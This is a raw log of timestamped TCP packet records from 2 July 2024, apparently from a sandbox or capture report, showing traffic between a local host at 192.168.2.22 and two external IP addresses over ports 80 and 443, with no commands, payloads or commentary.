                Jul 2, 2024 07:52:27.167912960 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.167922974 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.167959929 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.168025970 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.174161911 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.174177885 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.174316883 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.174329996 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.174348116 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.174618006 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.179088116 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.179105043 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.179115057 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.179163933 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.179163933 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.239598989 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.239670038 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.239682913 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.239752054 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.239752054 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.239917994 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.240180969 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.244565964 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.244581938 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.244630098 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.244630098 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.244986057 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.244999886 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.245050907 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.249355078 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.249372005 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.250046015 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.251240015 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.251255035 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.251266003 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.251312971 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.251312971 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.255875111 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.255888939 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.255959034 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.258639097 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.258652925 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.258969069 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.261811018 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.261823893 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.261873960 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.265719891 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.265734911 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.265746117 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.265801907 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.265801907 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.266628027 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.266642094 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.266717911 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.271250010 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.271262884 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.271274090 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.271289110 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.271301031 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.271317959 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.271317959 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.271347046 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.271347046 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.271650076 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.271661997 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.271672964 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.271684885 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.271697044 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.271697998 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.271717072 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.271717072 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.272051096 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.439999104 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.444920063 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.445020914 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.445024014 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.445038080 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.445086956 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.445086956 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.445379019 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.445390940 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.445434093 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.445434093 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.445633888 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.445674896 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.445692062 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.445734978 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.446110010 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.446121931 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.446192026 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.446397066 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.446506977 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.446593046 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.446604013 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.446796894 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.446878910 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.446890116 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.447077990 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.447189093 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.447319984 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.447365046 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.447376013 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.447563887 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.447731018 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.447741985 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.447906971 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.448040009 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.448148012 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.448158026 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.448160887 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.448198080 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.448467970 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.448478937 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.448549032 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.448796034 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.448872089 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.448915958 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.449100971 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.449111938 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.449224949 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.449292898 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.449417114 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.449428082 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.449511051 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.449769974 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.449888945 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.449922085 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.450016975 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.450086117 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.450097084 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.450107098 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.450273037 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.450273037 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.450752974 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.450783968 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.450829983 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.450874090 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.450894117 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.450978041 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.451109886 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.451194048 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.451256990 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.451417923 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.451436043 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.451482058 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.451621056 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.451822042 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.451881886 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.451891899 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.451920033 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.451936960 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.452137947 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.452223063 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.452248096 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.452409983 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.452644110 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.452725887 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.452960014 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.452979088 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.453077078 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.453134060 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.453289986 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.453304052 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.453404903 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.453411102 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.453423023 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.453471899 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.453471899 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.453815937 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.453893900 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.453903913 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.453993082 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.454154968 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.454318047 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.454417944 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.454500914 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.454509974 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.454520941 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.454593897 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.454780102 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.454791069 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.454801083 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.454838991 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.454838991 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.455287933 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.455379009 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.455389977 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.455404997 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.455527067 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.455570936 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.455626011 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.455637932 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.455647945 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.455686092 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.455686092 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.455686092 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.456110954 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.456197977 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.456207037 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.456244946 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.456305981 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.456412077 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.456422091 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.456433058 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.456478119 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.456478119 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.456768990 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.456859112 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.456870079 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.456875086 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.457021952 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.457180977 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.457191944 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.457201958 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.457214117 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.457237959 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.457247972 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.457247972 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.457545996 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.457556963 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.457725048 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.457873106 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.457953930 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.457963943 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.457997084 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458008051 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458008051 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458214998 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458225965 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458236933 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458247900 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458281040 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458281040 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458281040 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458724022 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458734989 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458745956 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458758116 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458767891 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458775043 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458775043 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458780050 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458792925 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458805084 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.458805084 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458805084 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458818913 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.458856106 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.574708939 CEST4916580192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:27.579603910 CEST8049165194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:27.579663038 CEST4916580192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:27.579770088 CEST4916580192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:27.584522009 CEST8049165194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:28.470932961 CEST8049165194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:28.471040964 CEST4916580192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:28.641256094 CEST4916580192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:28.641256094 CEST4916580192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:29.018472910 CEST4916680192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:29.023613930 CEST8049166194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:29.023718119 CEST4916680192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:29.023859024 CEST4916680192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:29.028760910 CEST8049166194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:29.937386990 CEST8049166194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:29.937581062 CEST4916680192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:29.937581062 CEST4916680192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:29.937633991 CEST4916680192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:29.946130037 CEST4916780192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:29.952120066 CEST8049167194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:29.952295065 CEST4916780192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:29.952497959 CEST4916780192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:29.958512068 CEST8049167194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:30.217216015 CEST8049163194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:30.217307091 CEST4916380192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:30.841842890 CEST8049167194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:30.841933966 CEST4916780192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:30.846520901 CEST4916780192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:30.846535921 CEST4916780192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:30.853072882 CEST8049167194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:30.853168964 CEST4916780192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:30.930182934 CEST4916880192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:30.935180902 CEST8049168194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:30.935241938 CEST4916880192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:30.935820103 CEST4916880192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:30.940606117 CEST8049168194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:32.075393915 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:32.075525999 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:35.157634020 CEST8049168194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:35.161365986 CEST4916980192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:35.166202068 CEST804916923.95.235.16192.168.2.22
                Jul 2, 2024 07:52:35.166296959 CEST4916980192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:35.166367054 CEST4916980192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:35.171308041 CEST804916923.95.235.16192.168.2.22
                Jul 2, 2024 07:52:35.362626076 CEST8049168194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:35.362746000 CEST4916880192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:35.895545959 CEST804916923.95.235.16192.168.2.22
                Jul 2, 2024 07:52:35.895874977 CEST804916923.95.235.16192.168.2.22
                Jul 2, 2024 07:52:35.896115065 CEST4916980192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:39.119442940 CEST4917080192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:39.124377012 CEST8049170194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:39.124454021 CEST4917080192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:39.124629974 CEST4917080192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:39.129939079 CEST8049170194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:39.691024065 CEST8049168194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:39.691253901 CEST4916880192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:39.691303015 CEST4916880192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:39.696296930 CEST8049168194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:40.087281942 CEST8049170194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:40.087779045 CEST49171443192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:40.087827921 CEST44349171194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:40.087883949 CEST49171443192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:40.088713884 CEST49171443192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:40.088745117 CEST44349171194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:40.286655903 CEST4917080192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:40.671619892 CEST804916923.95.235.16192.168.2.22
                Jul 2, 2024 07:52:40.671724081 CEST4916980192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:40.671818972 CEST4916980192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:40.678102970 CEST804916923.95.235.16192.168.2.22
                Jul 2, 2024 07:52:41.073923111 CEST44349171194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:41.074012041 CEST49171443192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:41.078172922 CEST49171443192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:41.078185081 CEST44349171194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:41.078490973 CEST44349171194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:41.097163916 CEST49171443192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:41.140511990 CEST44349171194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:41.759358883 CEST44349171194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:41.759483099 CEST44349171194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:41.759537935 CEST44349171194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:41.759557962 CEST49171443192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:41.759586096 CEST49171443192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:41.760282993 CEST49171443192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:41.760304928 CEST44349171194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:41.879539967 CEST4917280192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:41.884566069 CEST8049172194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:41.884637117 CEST4917280192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:41.884862900 CEST4917280192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:41.894073009 CEST8049172194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:43.865751028 CEST8049170194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:43.865881920 CEST4917080192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:43.866049051 CEST4917080192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:43.870845079 CEST8049170194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:46.049160004 CEST8049172194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:46.049283981 CEST4917280192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:46.056519985 CEST4917380192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:46.061346054 CEST804917323.95.235.16192.168.2.22
                Jul 2, 2024 07:52:46.061430931 CEST4917380192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:46.061533928 CEST4917380192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:46.066397905 CEST804917323.95.235.16192.168.2.22
                Jul 2, 2024 07:52:46.701834917 CEST804917323.95.235.16192.168.2.22
                Jul 2, 2024 07:52:46.701898098 CEST4917380192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:47.482974052 CEST4917480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:47.488029957 CEST804917423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:47.488096952 CEST4917480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:47.488358021 CEST4917480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:47.493170977 CEST804917423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:47.995713949 CEST804917423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:47.995737076 CEST804917423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:47.995748997 CEST804917423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:47.995873928 CEST4917480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:47.995896101 CEST804917423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:47.999048948 CEST4917480192.168.2.2223.95.235.16
